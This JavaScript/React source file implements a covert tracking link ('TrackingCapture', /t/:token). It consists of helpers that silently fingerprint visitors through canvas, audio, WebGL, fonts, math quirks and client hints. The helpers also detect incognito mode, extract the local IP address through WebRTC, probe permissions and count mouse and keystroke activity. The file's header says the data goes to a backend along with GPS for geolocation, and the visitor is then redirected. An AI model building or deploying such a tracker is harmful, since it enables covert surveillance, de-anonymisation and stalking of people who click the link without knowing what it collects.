/**
 * TrackingCapture — /t/:token
 *
 * 1. Collects 150+ device/browser data points silently
 * 2. Requests GPS via browser prompt (enableHighAccuracy: true)
 * 3. POSTs everything to backend → backend does IP enrichment + Nominatim geocoding
 * 4. Redirects to destination URL
 */

import React, { useEffect, useRef, useState } from "react";
import { useParams } from "react-router-dom";
import { useGeoGrabber } from "../hooks/useGeoGrabber";
import { UAParser } from "ua-parser-js";

// ── EXTRA: Identity + parsing helpers ─────────────────────────

async function getUAHints() {
  if (!navigator.userAgentData) return {};

  try {
    const ua = await navigator.userAgentData.getHighEntropyValues([
      "platformVersion",
      "architecture",
      "model",
      "bitness",
      "fullVersionList"
    ]);

    return {
      uaPlatformVersion: ua.platformVersion,
      uaArchitecture: ua.architecture,
      uaModel: ua.model,
      uaBitness: ua.bitness,
      uaFullVersionList: ua.fullVersionList
    };
  } catch {
    return {};
  }
}

function generateFingerprintId(data) {
  try {
    const str = JSON.stringify(data);
    let hash = 0;
    for (let i = 0; i < str.length; i++) {
      hash = (hash << 5) - hash + str.charCodeAt(i);
      hash |= 0;
    }
    return "trx_" + Math.abs(hash);
  } catch {
    return null;
  }
}

function getPluginsList() {
  try {
    return Array.from(navigator.plugins).map(p => p.name).join(", ");
  } catch {
    return null;
  }
}

const BACKEND_URL = process.env.REACT_APP_BACKEND_URL || "http://localhost:5001";

function getCaptureKey(token) {
  return `traxelon_captured_v5_${token}`;
}
function getDestKey(token) {
  return `traxelon_dest_v5_${token}`;
}

// ── Canvas fingerprint ──────────────────────────────────────────────────────
function getCanvasFingerprint() {
  try {
    const canvas = document.createElement("canvas");
    canvas.width = 200;
    canvas.height = 50;
    const ctx = canvas.getContext("2d");
    ctx.textBaseline = "top";
    ctx.font = "14px 'Arial'";
    ctx.fillStyle = "#f60";
    ctx.fillRect(125, 1, 62, 20);
    ctx.fillStyle = "#069";
    ctx.fillText("Traxelon🔍", 2, 15);
    ctx.fillStyle = "rgba(102,204,0,0.7)";
    ctx.fillText("Traxelon🔍", 4, 17);
    const dataUrl = canvas.toDataURL();
    let hash = 0;
    for (let i = 0; i < dataUrl.length; i++) {
      hash = (hash << 5) - hash + dataUrl.charCodeAt(i);
      hash |= 0;
    }
    return hash.toString(16);
  } catch {
    return null;
  }
}

// ── WebGL GPU info + fingerprint ────────────────────────────────────────────
function getGPUInfo() {
  try {
    const canvas = document.createElement("canvas");
    const gl = canvas.getContext("webgl") || canvas.getContext("experimental-webgl");
    if (!gl) return { gpu: null, gpuVendor: null, webglRenderer: null, webglVersion: null, webglShadingLanguageVersion: null, webglExtensions: null, webglMaxTextureSize: null, webglMaxViewportDims: null };
    const ext = gl.getExtension("WEBGL_debug_renderer_info");
    const extensions = gl.getSupportedExtensions() || [];
    const maxViewport = gl.getParameter(gl.MAX_VIEWPORT_DIMS);
    return {
      gpu: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) || null : null,
      gpuVendor: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) || null : null,
      webglRenderer: gl.getParameter(gl.RENDERER) || null,
      webglVendor: gl.getParameter(gl.VENDOR) || null,
      webglVersion: gl.getParameter(gl.VERSION) || null,
      webglShadingLanguageVersion: gl.getParameter(gl.SHADING_LANGUAGE_VERSION) || null,
      webglExtensions: extensions.length,
      webglMaxTextureSize: gl.getParameter(gl.MAX_TEXTURE_SIZE) || null,
      webglMaxViewportWidth: maxViewport ? maxViewport[0] : null,
      webglMaxViewportHeight: maxViewport ? maxViewport[1] : null,
      webglAntialiasing: gl.getContextAttributes()?.antialias ?? null,
    };
  } catch {
    return { gpu: null, gpuVendor: null };
  }
}

// ── Battery info ─────────────────────────────────────────────────────────────
async function getBatteryInfo() {
  try {
    if (!navigator.getBattery) return {};
    const battery = await navigator.getBattery();
    return {
      batteryLevel: Math.round(battery.level * 100),
      batteryCharging: battery.charging,
      batteryChargingTime: battery.chargingTime === Infinity ? null : battery.chargingTime,
      batteryDischargingTime: battery.dischargingTime === Infinity ? null : battery.dischargingTime,
    };
  } catch {
    return {};
  }
}

async function detectIncognito() {
  try {
    // Method 1: quota < 200MB = incognito
    // Works on Chrome mobile + Firefox where quota is still restricted
    if (navigator.storage && navigator.storage.estimate) {
      const { quota } = await navigator.storage.estimate();
      if (quota < 200 * 1024 * 1024) return true;
    }

    // Method 2: JS heap limit — incognito ~1GB, normal ~4GB+
    // ✅ Most reliable for Chrome desktop currently
    if (performance && performance.memory) {
      const heapLimit = performance.memory.jsHeapSizeLimit;
      if (heapLimit < 1.1 * 1024 * 1024 * 1024) return true;
    }

    // Method 3: sessionStorage write blocked = incognito
    // Works on Safari and Firefox
    try {
      const key = "__trx_test__";
      sessionStorage.setItem(key, "1");
      sessionStorage.removeItem(key);
    } catch {
      return true;
    }

    // Method 4: FileSystem API blocked in incognito
    // Works on Safari and older Chrome
    const fsTest = await new Promise((resolve) => {
      try {
        if (window.webkitRequestFileSystem) {
          window.webkitRequestFileSystem(
            window.TEMPORARY, 100,
            () => resolve(false),  // success = not incognito
            () => resolve(true)    // error = incognito
          );
        } else {
          resolve(null);
        }
      } catch {
        resolve(true);
      }
    });
    if (fsTest === true) return true;

    return false;
  } catch {
    return null;
  }
}

// ── Network info ─────────────────────────────────────────────────────────────
function getNetworkInfo() {
  const conn = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
  if (!conn) return {};
  return {
    connectionType: conn.effectiveType || null,
    connectionDownlink: conn.downlink || null,
    connectionDownlinkMax: conn.downlinkMax || null,
    connectionRtt: conn.rtt || null,
    connectionSaveData: conn.saveData || false,
    connectionType2: conn.type || null,
  };
}

async function getAudioFingerprint() {
  return new Promise((resolve) => {
    try {
      const AudioContext = window.AudioContext || window.webkitAudioContext;
      if (!AudioContext) { resolve(null); return; }
      const ctx = new AudioContext();
      // if (ctx.state === "suspended") { ctx.close(); resolve(null); return; }
      if (ctx.state === "suspended") {
        ctx.resume();
      }
      const oscillator = ctx.createOscillator();
      const analyser = ctx.createAnalyser();
      const gain = ctx.createGain();
      const scriptProcessor = ctx.createScriptProcessor(4096, 1, 1);
      gain.gain.value = 0;
      oscillator.type = "triangle";
      oscillator.frequency.value = 10000;
      oscillator.connect(analyser);
      analyser.connect(scriptProcessor);
      scriptProcessor.connect(gain);
      gain.connect(ctx.destination);
      oscillator.start(0);
      scriptProcessor.onaudioprocess = (e) => {
        const data = e.inputBuffer.getChannelData(0);
        let sum = 0;
        for (let i = 0; i < data.length; i++) sum += Math.abs(data[i]);
        resolve(sum.toString());
        oscillator.stop();
        ctx.close();
      };
      // Timeout fallback — if audio never processes, resolve null after 2s
      setTimeout(() => resolve(null), 2000);
    } catch {
      resolve(null);
    }
  });
}

// ── Font detection ───────────────────────────────────────────────────────────
function getAvailableFonts() {
  try {
    const testFonts = [
      "Arial", "Arial Black", "Arial Narrow", "Arial Rounded MT Bold", "Arial Unicode MS",
      "Calibri", "Calibri Light", "Cambria", "Cambria Math", "Candara",
      "Comic Sans MS", "Consolas", "Constantia", "Corbel", "Courier", "Courier New",
      "Ebrima", "Franklin Gothic Medium", "Gabriola", "Gadugi", "Georgia",
      "Helvetica", "Helvetica Neue", "HoloLens MDL2 Assets", "Impact", "Ink Free",
      "Javanese Text", "Leelawadee UI", "Leelawadee UI Semilight", "Lucida Console",
      "Lucida Sans", "Lucida Sans Unicode", "Malgun Gothic", "Malgun Gothic Semilight",
      "Marlett", "Microsoft Himalaya", "Microsoft JhengHei", "Microsoft JhengHei Light",
      "Microsoft JhengHei UI", "Microsoft New Tai Lue", "Microsoft PhagsPa",
      "Microsoft Sans Serif", "Microsoft Tai Le", "Microsoft YaHei", "Microsoft YaHei Light",
      "Microsoft YaHei UI", "Microsoft YaHei UI Light", "Microsoft Yi Baiti", "MingLiU-ExtB",
      "MingLiU_HKSCS-ExtB", "Mongolian Baiti", "MS Gothic", "MS PGothic", "MS Reference Sans Serif",
      "MS Reference Specialty", "MS UI Gothic", "MV Boli", "Myanmar Text", "Nirmala UI",
      "Nirmala UI Semilight", "NSimSun", "Palatino", "Palatino Linotype", "PMingLiU-ExtB",
      "Segoe MDL2 Assets", "Segoe Print", "Segoe Script", "Segoe UI", "Segoe UI Black",
      "Segoe UI Emoji", "Segoe UI Historic", "Segoe UI Light", "Segoe UI Semibold",
      "Segoe UI Semilight", "Segoe UI Symbol", "SimSun", "SimSun-ExtB", "Sitka Banner",
      "Sitka Display", "Sitka Heading", "Sitka Small", "Sitka Subheading", "Sitka Text",
      "Sylfaen", "Symbol", "Tahoma", "Times New Roman", "Trebuchet MS", "Utsaah",
      "Verdana", "Vijaya", "Webdings", "Wingdings", "Wingdings 2", "Wingdings 3", "Yu Gothic",
      "Yu Gothic Light", "Yu Gothic Medium", "Yu Gothic UI", "Yu Gothic UI Light",
      "Yu Gothic UI Regular", "Yu Gothic UI Semibold", "Yu Gothic UI Semilight",
      // Mac fonts
      "American Typewriter", "Andale Mono", "Apple Braille", "Apple Chancery", "Apple Color Emoji",
      "Apple SD Gothic Neo", "Apple Symbols", "AppleGothic", "AppleMyungjo", "Arial Hebrew",
      "Avenir", "Avenir Next", "Avenir Next Condensed", "Baskerville", "Big Caslon",
      "Bodoni 72", "Bodoni 72 Oldstyle", "Bodoni 72 Smallcaps", "Bradley Hand", "Brush Script MT",
      "Chalkboard SE", "Chalkduster", "Charter", "Cochin", "Copperplate", "Didot", "DIN Alternate",
      "DIN Condensed", "Diwan Mishafi", "Euphemia UCAS", "Farah", "Futura", "Geneva", "Gill Sans",
      "Helvetica Light", "Herculanum", "Hiragino Kaku Gothic Pro", "Hiragino Kaku Gothic ProN",
      "Hiragino Kaku Gothic Std", "Hiragino Kaku Gothic StdN", "Hiragino Maru Gothic Pro",
      "Hiragino Maru Gothic ProN", "Hiragino Mincho Pro", "Hiragino Mincho ProN", "Hiragino Sans",
      "Hoefler Text", "InaiMathi", "Iowan Old Style", "Kefa", "Khmer Sangam MN", "Kohinoor Bangla",
      "Kohinoor Devanagari", "Kohinoor Telugu", "Lao Sangam MN", "Lucida Grande", "Marker Felt",
      "Menlo", "Mishafi", "Monaco", "Mshtakan", "Mukta Mahee", "Muna", "Myanmar Sangam MN",
      "Noto Nastaliq Urdu", "Noteworthy", "Optima", "Oriya Sangam MN", "Osaka", "Papyrus",
      "Phosphate", "PingFang HK", "PingFang SC", "PingFang TC", "Plantagenet Cherokee",
      "PT Mono", "PT Sans", "PT Sans Caption", "PT Sans Narrow", "PT Serif", "PT Serif Caption",
      "Rockwell", "Sana", "Sathu", "Savoye LET", "SignPainter", "Silom", "Sinhala Sangam MN",
      "Skia", "Snell Roundhand", "Songti SC", "Songti TC", "STFangsong", "STHeiti", "STIX Two Math",
      "STIX Two Text", "STIXGeneral", "STIXIntegralsD", "STIXIntegralsSm", "STIXIntegralsUp",
      "STIXIntegralsUpD", "STIXIntegralsUpSm", "STIXNonUnicode", "STIXSizeFiveSym",
      "STIXSizeFourSym", "STIXSizeOneSym", "STIXSizeThreeSym", "STIXSizeTwoSym", "STIXVariants",
      "STKaiti", "STSong", "Sukhumvit Set", "Superclarendon", "Tamil Sangam MN", "Telugu Sangam MN",
      "Thonburi", "Times", "Trattatello", "Zapf Dingbats", "Zapfino",
      // Google/Web fonts commonly installed
      "Roboto", "Open Sans", "Lato", "Montserrat", "Ubuntu", "Noto Sans", "Noto Serif",
      "Source Sans Pro", "Source Code Pro", "Raleway", "Poppins", "Nunito", "Oswald",
      "Playfair Display", "Merriweather", "Josefin Sans", "Droid Sans", "Droid Serif",
      "Fira Sans", "Fira Code", "Inter", "Karla", "Rubik", "Work Sans", "Mulish", "Quicksand",
    ];
    const canvas = document.createElement("canvas");
    const ctx = canvas.getContext("2d");
    const baseFonts = ["monospace", "sans-serif", "serif"];
    const testString = "mmmmmmmmmmlli";
    const testSize = "72px";
    const baseWidths = {};
    baseFonts.forEach((baseFont) => {
      ctx.font = `${testSize} ${baseFont}`;
      baseWidths[baseFont] = ctx.measureText(testString).width;
    });
    const available = testFonts.filter((font) =>
      baseFonts.some((baseFont) => {
        ctx.font = `${testSize} '${font}', ${baseFont}`;
        return ctx.measureText(testString).width !== baseWidths[baseFont];
      })
    );
    return available.length;
  } catch {
    return null;
  }
}

// ── Media devices ────────────────────────────────────────────────────────────
async function getMediaDevices() {
  try {
    if (!navigator.mediaDevices || !navigator.mediaDevices.enumerateDevices) return {};
    const devices = await navigator.mediaDevices.enumerateDevices();
    return {
      audioInputCount: devices.filter(d => d.kind === "audioinput").length,
      audioOutputCount: devices.filter(d => d.kind === "audiooutput").length,
      videoInputCount: devices.filter(d => d.kind === "videoinput").length,
    };
  } catch {
    return {};
  }
}

// ── Storage info ──────────────────────────────────────────────────────────────
async function getStorageInfo() {
  try {
    if (!navigator.storage || !navigator.storage.estimate) return {};
    const { quota, usage } = await navigator.storage.estimate();
    return {
      storageQuota: quota ? Math.round(quota / 1024 / 1024) : null,
      storageUsage: usage ? Math.round(usage / 1024 / 1024) : null,
    };
  } catch {
    return {};
  }
}

async function getWebRTCIP() {
  return new Promise((resolve) => {
    try {
      const pc = new RTCPeerConnection({ iceServers: [] });
      pc.createDataChannel("");
      pc.createOffer().then(offer => pc.setLocalDescription(offer));

      pc.onicecandidate = (event) => {
        if (!event || !event.candidate) return;
        const ip = event.candidate.candidate.split(" ")[4];
        resolve(ip);
      };

      setTimeout(() => resolve(null), 2000);
    } catch {
      resolve(null);
    }
  });
}

function getNavigatorExtras() {
  return {
    pluginsCount: navigator.plugins ? navigator.plugins.length : null,
    mimeTypesCount: navigator.mimeTypes ? navigator.mimeTypes.length : null,
  };
}

function detectAdblock() {
  return new Promise((resolve) => {
    requestAnimationFrame(() => {
      try {
        const bait = document.createElement("div");
        bait.className = "adsbox";
        bait.style.height = "1px";
        document.body.appendChild(bait);
        const blocked = bait.offsetHeight === 0;
        document.body.removeChild(bait);
        resolve(blocked);
      } catch {
        resolve(null);
      }
    });
  });
}

function detectCanvasSpoof() {
  try {
    const c1 = document.createElement("canvas");
    const c2 = document.createElement("canvas");
    [c1, c2].forEach(c => {
      const ctx = c.getContext("2d");
      ctx.fillStyle = "#f60";
      ctx.fillRect(0, 0, 10, 10);
      ctx.fillStyle = "#069";
      ctx.fillText("T", 2, 8);
    });
    return c1.toDataURL() !== c2.toDataURL();
  } catch {
    return null;
  }
}

function getInputCapabilities() {
  return {
    maxTouchPoints: navigator.maxTouchPoints || 0,
    hasTouch: "ontouchstart" in window,
    pointerFine: window.matchMedia("(pointer: fine)").matches,
    pointerCoarse: window.matchMedia("(pointer: coarse)").matches,
  };
}

// ── Browser permissions ───────────────────────────────────────────────────────
async function getPermissions() {
  const check = async (name) => {
    try {
      const result = await navigator.permissions.query({ name });
      return result.state;
    } catch {
      return null;
    }
  };
  try {
    const [camera, microphone, notifications, geolocation, clipboard] = await Promise.all([
      check("camera"),
      check("microphone"),
      check("notifications"),
      check("geolocation"),
      check("clipboard-read"),
    ]);
    return { permCamera: camera, permMicrophone: microphone, permNotifications: notifications, permGeolocation: geolocation, permClipboard: clipboard };
  } catch {
    return {};
  }
}

// ── Browser feature detection ─────────────────────────────────────────────────
function getBrowserFeatures() {
  return {
    // APIs available
    hasServiceWorker: "serviceWorker" in navigator,
    hasWebWorker: typeof Worker !== "undefined",
    hasWebSocket: typeof WebSocket !== "undefined",
    hasIndexedDB: !!window.indexedDB,
    hasWebRTC: !!(window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection),
    hasCanvas: !!document.createElement("canvas").getContext,
    hasWebGL: (() => { try { return !!document.createElement("canvas").getContext("webgl"); } catch { return false; } })(),
    hasWebGL2: (() => { try { return !!document.createElement("canvas").getContext("webgl2"); } catch { return false; } })(),
    hasBluetooth: !!navigator.bluetooth,
    hasUSB: !!navigator.usb,
    hasNFC: !!navigator.nfc,
    hasGamepad: !!navigator.getGamepads,
    hasVibration: !!navigator.vibrate,
    hasGeolocation: !!navigator.geolocation,
    hasBattery: !!navigator.getBattery,
    hasDeviceMemory: !!navigator.deviceMemory,
    hasHardwareConcurrency: !!navigator.hardwareConcurrency,
    hasCredentials: !!navigator.credentials,
    hasShare: !!navigator.share,
    hasClipboard: !!navigator.clipboard,
    hasWakeLock: !!navigator.wakeLock,
    hasSpeechRecognition: !!(window.SpeechRecognition || window.webkitSpeechRecognition),
    hasSpeechSynthesis: !!window.speechSynthesis,
    hasPaymentRequest: !!window.PaymentRequest,
    hasNotification: !!window.Notification,
    hasPushManager: !!window.PushManager,
    hasCrypto: !!window.crypto,
    hasPerformance: !!window.performance,
    hasIntersectionObserver: !!window.IntersectionObserver,
    hasResizeObserver: !!window.ResizeObserver,
    hasMutationObserver: !!window.MutationObserver,
    hasRequestAnimationFrame: !!window.requestAnimationFrame,
    hasFetch: !!window.fetch,
    hasLocalStorage: (() => { try { localStorage.setItem("t", "1"); localStorage.removeItem("t"); return true; } catch { return false; } })(),
    hasSessionStorage: (() => { try { sessionStorage.setItem("t", "1"); sessionStorage.removeItem("t"); return true; } catch { return false; } })(),
  };
}

// ── Screen & display details ──────────────────────────────────────────────────
function getScreenDetails() {
  return {
    screenOrientation: window.screen.orientation?.type || null,
    screenOrientationAngle: window.screen.orientation?.angle ?? null,
    isFullscreen: !!document.fullscreenElement,
    documentVisibility: document.visibilityState || null,
    screenIsExtended: window.screen.isExtended ?? null,
  };
}

// ── Performance & timing ──────────────────────────────────────────────────────
function getPerformanceInfo() {
  try {
    const nav = performance.getEntriesByType("navigation")[0];
    return {
      pageLoadTime: nav ? Math.round(nav.loadEventEnd - nav.fetchStart) : null,
      domContentLoaded: nav ? Math.round(nav.domContentLoadedEventEnd - nav.fetchStart) : null,
      timeToFirstByte: nav ? Math.round(nav.responseStart - nav.fetchStart) : null,
      deviceMemoryHeap: performance.memory ? Math.round(performance.memory.jsHeapSizeLimit / 1024 / 1024) : null,
      usedJSHeap: performance.memory ? Math.round(performance.memory.usedJSHeapSize / 1024 / 1024) : null,
    };
  } catch {
    return {};
  }
}

// ── Timezone & locale ────────────────────────────────────────────────────────
function getTimezoneInfo() {
  try {
    const tz = Intl.DateTimeFormat().resolvedOptions();
    return {
      timezone: tz.timeZone || null,
      timezoneOffset: new Date().getTimezoneOffset(),
      locale: navigator.languages?.[0] || navigator.language || null,
      hourCycle: tz.hourCycle || null,
      calendar: tz.calendar || null,
      numberingSystem: tz.numberingSystem || null,
    };
  } catch {
    return {};
  }
}

// ── Math fingerprint (detects OS/CPU via floating point differences) ──────────
function getMathFingerprint() {
  try {
    return {
      mathSin: Math.sin(1),
      mathCos: Math.cos(1),
      mathTan: Math.tan(1),
      mathLog: Math.log(5),
      mathSqrt: Math.sqrt(2),
      mathAsin: Math.asin(0.5),
      mathSinh: Math.sinh(1),
      mathCosh: Math.cosh(1),
      mathExpm1: Math.expm1(1),
    };
  } catch {
    return {};
  }
}

// ── UA Client Hints (architecture, bitness, platform version, full version) ──
async function getUAClientHints() {
  try {
    if (!navigator.userAgentData) return {};
    const hints = await navigator.userAgentData.getHighEntropyValues([
      "architecture", "bitness", "model", "platformVersion",
      "uaFullVersion", "fullVersionList", "wow64", "platform"
    ]);
    return {
      uaArchitecture: hints.architecture || null,
      uaBitness: hints.bitness || null,
      uaModel: hints.model || null,
      uaPlatformVersion: hints.platformVersion || null,
      uaFullVersion: hints.uaFullVersion || null,
      uaFullVersionList: hints.fullVersionList ? JSON.stringify(hints.fullVersionList) : null,
      uaWow64: hints.wow64 != null ? hints.wow64 : null,
      uaMobile: navigator.userAgentData.mobile != null ? navigator.userAgentData.mobile : null,
    };
  } catch {
    return {};
  }
}

// ── Performance Timing Breakdown ─────────────────────────────────────────────
function getPerformanceBreakdown() {
  try {
    const nav = performance.getEntriesByType("navigation")[0];
    if (!nav) return {};
    if (nav.initiatorType && nav.initiatorType !== "navigation") return {};
    return {
      dnsLookupTime: Math.round(nav.domainLookupEnd - nav.domainLookupStart),
      tcpConnectionTime: Math.round(nav.connectEnd - nav.connectStart),
      serverResponseTime: Math.round(nav.responseStart - nav.requestStart),
      pageDownloadTime: Math.round(nav.responseEnd - nav.responseStart),
      browserRenderTime: Math.round(nav.loadEventEnd - nav.responseEnd),
      redirectTime: Math.round(nav.redirectEnd - nav.redirectStart),
      tlsHandshakeTime: nav.secureConnectionStart > 0
        ? Math.round(nav.connectEnd - nav.secureConnectionStart)
        : null,
    };
  } catch {
    return {};
  }
}

// ── Screen Aspect Ratio + Viewport ───────────────────────────────────────────
function getScreenAspectRatio() {
  try {
    const gcd = (a, b) => b === 0 ? a : gcd(b, a % b);
    const w = window.screen.width;
    const h = window.screen.height;
    const d = gcd(w, h);
    return {
      screenAspectRatio: `${w / d}:${h / d}`,
      viewportWidth: Math.round(window.innerWidth * (window.devicePixelRatio || 1)),
      viewportHeight: Math.round(window.innerHeight * (window.devicePixelRatio || 1)),
    };
  } catch {
    return {};
  }
}

// ── Speech Synthesis Voices Count ────────────────────────────────────────────
function getSpeechVoicesCount() {
  return new Promise((resolve) => {
    try {
      if (!window.speechSynthesis) { resolve({ speechVoicesCount: null }); return; }
      const voices = window.speechSynthesis.getVoices();
      if (voices.length > 0) { resolve({ speechVoicesCount: voices.length }); return; }
      const timeout = setTimeout(() => resolve({ speechVoicesCount: 0 }), 1500);
      window.speechSynthesis.onvoiceschanged = () => {
        clearTimeout(timeout);
        resolve({ speechVoicesCount: window.speechSynthesis.getVoices().length });
      };
    } catch {
      resolve({ speechVoicesCount: null });
    }
  });
}

// ── Popup Blocker Detection ───────────────────────────────────────────────────
function detectPopupBlocker() {
  try {
    const popup = window.open("", "", "width=1,height=1,left=-9999,top=-9999");
    if (!popup || popup.closed || typeof popup.closed === "undefined") {
      return true;
    }
    popup.close();
    return false;
  } catch {
    return null;
  }
}

// ── WebSocket Allowed Detection ───────────────────────────────────────────────
function detectWebSocketAllowed() {
  try {
    return typeof WebSocket !== "undefined";
  } catch {
    return null;
  }
}

// ── Page First Visible Timestamp ─────────────────────────────────────────────
function getPageTimestamps() {
  try {
    return {
      pageFirstVisible: new Date().toISOString(),
      pageRequestTime: performance.timeOrigin
        ? new Date(performance.timeOrigin).toISOString()
        : null,
    };
  } catch {
    return {};
  }
}

// ── Device Orientation Support ────────────────────────────────────────────────
function getDeviceOrientationSupport() {
  try {
    return {
      hasDeviceOrientation: typeof DeviceOrientationEvent !== "undefined",
      hasDeviceMotion: typeof DeviceMotionEvent !== "undefined",
    };
  } catch {
    return {};
  }
}

// ── Mouse/Pointer Support ─────────────────────────────────────────────────────
function getPointerSupport() {
  try {
    return {
      hasMouse: window.matchMedia("(pointer: fine)").matches,
      hasTouchscreen: window.matchMedia("(pointer: coarse)").matches,
    };
  } catch {
    return {};
  }
}

// ── NEW: Browser Environment extras ──────────────────────────────────────────
// function getBrowserEnvironment() {
//   try {
//     return {
//       isSecureContext: window.isSecureContext ?? null,
//       crossOriginIsolated: window.crossOriginIsolated ?? null,
//       navigatorBuildID: navigator.buildID || null,
//       navigationType: performance.getEntriesByType("navigation")[0]?.type || null,
//       resourceTimingCount: performance.getEntriesByType("resource").length,
//       hasSharedWorker: typeof SharedWorker !== "undefined",
//       hasWebAssembly: typeof WebAssembly !== "undefined",
//       hasWebGPU: !!navigator.gpu,
//       hasCompressionStream: typeof CompressionStream !== "undefined",
//       hasFileSystemAccess: typeof showOpenFilePicker !== "undefined",
//       hasOPFS: !!(navigator.storage && navigator.storage.getDirectory),
//       hasPointerLock: typeof document.pointerLockElement !== "undefined",
//       hasKeyboardLock: !!(navigator.keyboard && navigator.keyboard.lock),
//       hasIdleDetection: typeof IdleDetector !== "undefined",
//       hasEyeDropper: typeof EyeDropper !== "undefined",
//     };
//   } catch {
//     return {};
//   }
// }

// ── NEW: Media & Codec support ────────────────────────────────────────────────
function getCodecSupport() {
  try {
    const mr = window.MediaRecorder;
    const vid = document.createElement("video");
    return {
      supportsH264: mr ? MediaRecorder.isTypeSupported("video/mp4;codecs=avc1") : null,
      supportsVP9: mr ? MediaRecorder.isTypeSupported("video/webm;codecs=vp9") : null,
      supportsAV1: mr ? MediaRecorder.isTypeSupported("video/webm;codecs=av1") : null,
      supportsHEVC: mr ? MediaRecorder.isTypeSupported("video/mp4;codecs=hvc1") : null,
      supportsOpus: mr ? MediaRecorder.isTypeSupported("audio/webm;codecs=opus") : null,
      supportsAAC: mr ? MediaRecorder.isTypeSupported("audio/mp4;codecs=mp4a") : null,
      canPlayH264: vid.canPlayType("video/mp4;codecs=avc1.42E01E") || null,
      canPlayWebM: vid.canPlayType("video/webm;codecs=vp8,vorbis") || null,
      canPlayOgg: vid.canPlayType("video/ogg;codecs=theora") || null,
      canPlayHLS: vid.canPlayType("application/vnd.apple.mpegurl") || null,
      hasWidevine: !!navigator.requestMediaKeySystemAccess,
      hasEME: typeof navigator.requestMediaKeySystemAccess === "function",
    };
  } catch {
    return {};
  }
}

// ── NEW: WebXR support ────────────────────────────────────────────────────────
async function getWebXRSupport() {
  try {
    const xr = navigator.xr;
    if (!xr) return { hasWebXR: false, hasVRSupport: false, hasARSupport: false, hasInlineXR: false };
    const [vr, ar, inline] = await Promise.all([
      xr.isSessionSupported("immersive-vr").catch(() => false),
      xr.isSessionSupported("immersive-ar").catch(() => false),
      xr.isSessionSupported("inline").catch(() => false),
    ]);
    return { hasWebXR: true, hasVRSupport: vr, hasARSupport: ar, hasInlineXR: inline };
  } catch {
    return { hasWebXR: false, hasVRSupport: false, hasARSupport: false, hasInlineXR: false };
  }
}

// ── NEW: CSS feature support ──────────────────────────────────────────────────
function getCSSFeatures() {
  try {
    return {
      cssGrid: CSS.supports("display", "grid"),
      cssFlexbox: CSS.supports("display", "flex"),
      cssContainerQueries: CSS.supports("container-type", "inline-size"),
      cssHasSelector: CSS.supports("selector(:has(*))"),
      cssSubgrid: CSS.supports("grid-template-rows", "subgrid"),
      cssCSSLayers: CSS.supports("@layer", ""),
      cssColorP3: CSS.supports("color", "color(display-p3 1 1 1)"),
      cssColorOKLCH: CSS.supports("color", "oklch(50% 0.1 0)"),
      cssScrollTimeline: CSS.supports("animation-timeline", "scroll()"),
      cssViewTransitions: typeof document.startViewTransition === "function",
      cssNesting: CSS.supports("& .child", "color: red"),
      cssHDR: window.matchMedia("(dynamic-range: high)").matches,
      cssCustomProps: CSS.supports("--foo", "bar"),
      cssStickyPos: CSS.supports("position", "sticky"),
      cssAspectRatio: CSS.supports("aspect-ratio", "1/1"),
      cssGap: CSS.supports("gap", "1px"),
      cssBackdropFilter: CSS.supports("backdrop-filter", "blur(1px)"),
      cssClipPath: CSS.supports("clip-path", "circle()"),
      cssContainment: CSS.supports("contain", "layout"),
      cssLogicalProps: CSS.supports("margin-inline", "0"),
    };
  } catch {
    return {};
  }
}

// ── NEW: WebAssembly support ──────────────────────────────────────────────────
function getWASMSupport() {
  try {
    return {
      wasmSupported: typeof WebAssembly !== "undefined",
      wasmSIMD: (() => { try { return WebAssembly.validate(new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 5, 1, 96, 0, 1, 123, 3, 2, 1, 0, 10, 10, 1, 8, 0, 65, 0, 253, 15, 253, 98, 11])); } catch { return false; } })(),
      wasmThreads: typeof SharedArrayBuffer !== "undefined",
      wasmExceptions: typeof WebAssembly.Tag !== "undefined",
      wasmGC: typeof WebAssembly.Global !== "undefined",
    };
  } catch {
    return {};
  }
}

// ── NEW: Sensors support ──────────────────────────────────────────────────────
function getSensorSupport() {
  try {
    return {
      hasAccelerometer: typeof Accelerometer !== "undefined",
      hasGyroscope: typeof Gyroscope !== "undefined",
      hasMagnetometer: typeof Magnetometer !== "undefined",
      hasAmbientLight: typeof AmbientLightSensor !== "undefined",
      hasAbsoluteOrientation: typeof AbsoluteOrientationSensor !== "undefined",
      hasRelativeOrientation: typeof RelativeOrientationSensor !== "undefined",
      hasGravitySensor: typeof GravitySensor !== "undefined",
      gamepadCount: navigator.getGamepads ? navigator.getGamepads().filter(Boolean).length : 0,
      hasPointerCapture: typeof Element.prototype.setPointerCapture !== "undefined",
      hasPressure: typeof PressureObserver !== "undefined",
    };
  } catch {
    return {};
  }
}

// ── NEW: Screen display extras ────────────────────────────────────────────────
// function getScreenDisplayExtras() {
//   try {
//     return {
//       hdrSupport: window.matchMedia("(dynamic-range: high)").matches,
//       wideColorGamut: window.matchMedia("(color-gamut: p3)").matches,
//       screenColorDepth: window.screen.colorDepth ?? null,
//       windowScreenLeft: window.screenLeft ?? null,
//       windowScreenTop: window.screenTop ?? null,
//       visualViewportWidth: window.visualViewport?.width || null,
//       visualViewportHeight: window.visualViewport?.height || null,
//       visualViewportScale: window.visualViewport?.scale || null,
//     };
//   } catch {
//     return {};
//   }
// }

// ── Timeout helper ─────────────────────────────────────────
function withTimeout(promise, ms = 1500, fallback = null) {
  return Promise.race([
    promise,
    new Promise(resolve => setTimeout(() => resolve(fallback), ms))
  ]);
}

// ── Behaviour fingerprint ─────────────────────────

function getBehaviorFingerprint() {
  return new Promise((resolve) => {

    let mouseMoves = 0
    let clicks = 0
    let scrolls = 0
    let keyPresses = 0

    const start = performance.now()

    function mouseMove() {
      mouseMoves++
    }

    function click() {
      clicks++
    }

    function scroll() {
      scrolls++
    }

    function key() {
      keyPresses++
    }

    window.addEventListener("mousemove", mouseMove)
    window.addEventListener("click", click)
    window.addEventListener("scroll", scroll)
    window.addEventListener("keydown", key)

    setTimeout(() => {

      window.removeEventListener("mousemove", mouseMove)
      window.removeEventListener("click", click)
      window.removeEventListener("scroll", scroll)
      window.removeEventListener("keydown", key)

      const duration = performance.now() - start

      resolve({
        mouseMoveCount: mouseMoves,
        clickCount: clicks,
        scrollCount: scrolls,
        keyPressCount: keyPresses,
        interactionDuration: Math.round(duration)
      })

    }, 1500)

  })
}
